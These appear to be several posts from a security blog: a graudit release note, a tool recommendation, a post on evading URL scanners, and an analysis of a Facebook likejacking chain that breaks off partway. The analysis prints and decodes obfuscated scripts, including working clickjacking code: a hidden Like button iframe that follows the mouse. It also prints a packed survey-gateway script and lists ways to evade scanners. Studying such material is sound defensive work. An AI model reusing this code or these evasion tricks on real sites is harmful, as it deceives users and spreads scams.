Just Another Hacker

It is time for another graudit release, and this time it includes some big changes.

• New PHP signatures

• Improved C signatures for fewer false positives

• Improved dotnet signatures

• Whitespace neutrality for all signatures

• -l operator lists available databases

• -x operator for excluding files

• configure script added to make chain

• Makefile install targets changed, install is now server wide

Package maintainers should take note of the last change. The make file currently supports the old style home directory install (make user install), but that is deprecated and will be dropped as ./configure --prefix /home/user/bin --dbdir /home/user/.graudit;make install does the same thing.
I have also added some scripts from my talks, you can find them in the aux directory. There are no install rules for them so they are only available from within the graudit-1.7_src tarball. My thanks to the people who contributed with patches and bug reports, keep them coming.

You can download the latest version from the graudit download page.

Like most of my favourite tools halberd does one thing, and does it well. It tries to detect individual servers behind a load balancer. The idea behind it is not new, but this is the best put together tool that I have used. It even handles multiple A records right off the bat. It is a little short on documentation and the error messages could be better, but it's still a great reconnaissance/testing tools for pen testers and system administrators alike.

Grab your copy today from http://halberd.superadditive.com/

As promised I have uploaded the slides and the corresponding advisory for my graudit talk at the ruxcon meetup this month.

Url scanning seems to be an emerging trend. Detecting malware distribution channels and preventing infections is easier than cleaning up the mess they make. The basis of the idea is good, but the current implementations. I have been mulling on this for a while, ever since I read Russ McRae's post (rant?) on url shorteners needing to detect malware.

The initial problems that url scanners face are simple evasion techniques, such as the click to get infected method that you can see in my previous post. This blogspot url scores quite cleanly.

And why shouldn't it? It doesn't contain anything directly malicious and so it should score cleanly until reputation or reactive defense catches up with it. Listen you say, who cares about the herding page, it doesn't do anything, it's the delivery page we care about. If a user visits a "benign" page that redirects him to malware, it will still be stopped at the malicious page!

Alas dear friend, a simple server side block is all it takes to stop http://scanner.novirusthanks.org from accessing the offending page (http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html).
 
Other documented techniques seen in the wild include only delivering the malicious pay load on 1 of x requests, user agent filtering, js obfu that will break automated deobfu and more. I have seen an alert box break browser automation, so there is no shortage of options for the bad guys. However considering how simple it is to shutdown todays url scanners I doubt we will see too many advanced techniques yet. Url scanning might overcome these simple bypasses in the future, but they should not be considered defense and certainly not a replacement for your desktop AV.

Today I noticed this one in my facebook feed and thought; that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.

~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>

The blogspot page delivers a access.im link visible as a "skip this add page" image and redirects to http:// allhqpics.com/ the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Lets head further down the burrow

~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>

Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings

~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->

Decoding that string gives us:

<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>

I'll get back to the second html page in a bit, first lets check bottom.js from the first page:

~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->

Which decodes to:

<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>

This gets a little more interesting, now there is a CSRF request to facebook for you to like the malicious site and lure more unsuspecting victims. It's time to pick up the pace and move on.

~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>

And the reference to cpalead gives it away. That url delivers your typical function(p,a,c,k,e,d) obfuscated javascript which we decode using the tom liston method

function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))

Which gives us more obfuscated javascript

var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function 